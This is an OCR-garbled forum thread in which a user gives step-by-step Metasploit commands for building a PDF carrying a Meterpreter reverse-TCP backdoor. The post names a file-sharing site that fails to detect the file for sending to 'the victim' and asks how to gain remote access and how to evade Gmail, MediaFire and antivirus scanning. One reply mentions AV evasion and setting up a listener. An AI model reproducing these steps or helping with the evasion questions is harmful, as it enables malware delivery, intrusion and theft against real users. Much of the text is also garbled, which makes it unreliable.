22812017
Browse
Forums
Embedding a backdoor in a POF fle (torial + questions) - Metasploit Minute - HakS Forums
Search Q
Minute SAI Activity
Embedding a backdoor in a Serine fatow his | Foor
PDF file (tutorial + questions)
By Zer0Gravity, April 28 in Metasploit Minute
¢ <
Wak
Zer0Gravity
Newbie
Members
1 post
< <
Posted April 28,
Hello!
In this post, | am going to tell you how | embedded a backdoor in 2 PDF file and
uploaded onto the Internet. However, there are still some obscurities that | need
YOUR help with:
1. Step: Preparation
Download a random pdf file from the internet and save it to the "root directory"
(Root directory ~> Go to ‘places’ and then "Home" and put it in there)
2. Step: Forging the backdoored file
go to terminal and execute the command 'msfconsole"
- after that, execute the command “use
exploit/windows/fileformat/adobe_pdf_embedded_exe"
~ after that, execute the command “set payload
windows/meterpreter/reverse_top"
~ after that, execute the command “set INFILENAME
PutTheNameOfThePaffileAlongsideWithTheExtensionHere’ so for example:
set INFILENAME book pdf
~ after that, execute the command “set FILENAME DesiredOutputFileName.paf"
so for example: set FILENAME LovePoem.paf
- after that, execute the command "set LHOST IpOfTheAttackerGoesHere(your
ip)"
~ after that, execute the command ‘exploit’
hps:forums.hakSoritopic/40886-embedding-2-backdoor-i-a-pdl-fl-ttorial- questions! “4‘sepaizoi7 Embedding a backdoor in a POF fle (ural + questions) - Metasploit Minute - HakS Forums
3, Step: Locating our creation
‘After the backdoor has been successfully embedded to the PDF file, itis stored
somewhere in the
machine (it tells you where after the file is generated)
Open up a terminal and execute “ed FileDestinationWithoutTheFileGoesHere"
The output of the created file was:
[4] Reading in '/root/book. pdf...
[A] Parsing '/root/book pdf.
4] Using ‘windows/meterpreter/reverse_tcp’ as payload.
[+] Parsing Successful. Creating ‘LovePoem.pdf file.
[4] LovePoem pdf stored at /root/.msf4/local/LovePoem pdf
So open up the terminal and type ed /roo/.msf4/local/"
After this command is executed, it moves our directory to the specified path.
Then, execute the command "Is" to list all the files inside the directory.
4. Step: Copying the file to desktop
‘After the file is located using the cd and Is commands, it has to be copied.
~ Execute the command: cp /root/.msf4/local/LovePoem.paf /root/Desktop/
5, Step: Uploading the file on the web
After the file is forged and retrieved to dekstop, it has to be uploaded to the
internet,
Popular file sharing networks such as MediaFire and Gmail have recognised the
infected file, but a
file sharing network called "SendSpace" didnt. You can easily upload the file
there and send the
link to the victim.
So now I need your help, to answer me to these questions:
1 After the victim has downloaded the file (Ie’s assume that the antivirus
hasn't detected it), how can I gain a remote access to it? (which commands do |
need to execute ete.
2. How can | prevent the infected file from being detected by Gmail and
Mediafire?
3. How can | prevent the infeted file from being detected by the anti virus?
| appreciate all the time taken to read this post or answer any of the questions
D
hps:forums.hakSoritopic/40886-embedding-2-backdoor-i-a-pdl-fl-ttorial- questions! 21622812017 Embedding a backdoor in a POF fle (torial + questions) - Metasploit Minute - HakS Forums
wutanglan Posted June 26
Newbie
If this machine has modern Windows packages, | would bet my life the above
file that gets extracted will be detected by an AV solution. There are ways to
attempt to make it undetected which you can look into. | recommend Georgia
Weidman's book: "Penetration Testing: A hands on Introduction to hacking" for
further info. She covers the whole process of using metasploit in a fundamental
‘Active Members way and bypassing AV, and also how it's done. I would look into more in WHY
6 posts these exploits / payloads work instead of how to reach a specific goal. Also, in
order for you to access the target machine, you will need to setup a listener on
your own machine.
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account Signin
‘Sign up for a new account in our community. It's Already have an account? Sign in here.
easy!
amano
Register anew accoun
f ign in with Faceboo y Sign in with Twitter
G0 To TOPIC LISTING
Metasploit Minute
vf Gm 3 Owe ®
RECENTLY BROWSING 0 MEMBERS
hups:forums.hakSorltopc/40886-embedding-2-backdoor-i-a-pdl-fl-tutorial- questions! 3822812017 Embedding a backdoor in a POF fle (torial + questions) - Metasploit Minute - HakS Forums
No registered users viewing this page.
ft Home > Haké
asploit Minu
4ak5 LLC
Powered by Invision Community
htps:forums.hakSorltopc/40886-embedding-e-backdoor-i-a-pdl-fl-tutorial- questions!
A All Activity
418